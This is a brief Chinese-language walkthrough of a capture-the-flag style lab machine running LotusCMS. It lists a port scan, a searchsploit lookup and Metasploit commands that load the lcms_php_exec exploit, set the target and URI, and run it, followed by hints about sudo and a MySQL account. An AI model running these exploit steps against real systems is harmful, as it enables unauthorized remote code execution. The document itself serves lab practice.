简介里说了
先要配置hosts
找靶机扫端口
80 22
登录界面
LotusCMS
搜漏洞
searchsploit Lotus
直接msf
设置RHOSTS、URI
search lotus
use exploit/multi/http/lcms_php_exec
show options
set RHOSTS 192.168.0.128
set URI /
run
提示用sudo ht
一个mysql账号
找到账号密码
这个靶机的解法不止一种